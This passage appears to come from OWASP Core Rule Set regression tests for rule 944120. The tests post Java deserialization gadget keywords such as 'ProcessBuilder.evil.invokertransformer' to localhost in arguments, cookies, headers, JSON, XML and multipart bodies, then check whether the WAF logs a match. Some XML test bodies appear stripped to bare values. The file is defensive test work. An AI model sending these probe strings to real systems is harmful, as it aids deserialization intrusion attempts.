"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-61 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-62 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-63 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-64 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-65 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-66 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-67 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-68 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-69 + desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-70 + desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-71 + desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-72 + desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.invokertransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-73 + desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-74 + desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-75 + desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-76 + desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-77 + desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-78 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-79 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-80 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-81 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-82 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-83 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-84 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-85 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-86 + desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-87 + desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-88 + desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-89 + desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeclonefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-90 + desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-91 + desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-92 + desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-93 + desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-94 + desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-95 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-96 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-97 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-98 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-99 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-100 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-101 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-102 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-103 + desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-104 + desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-105 + desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-106 + desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeserializationfactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-107 + desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: 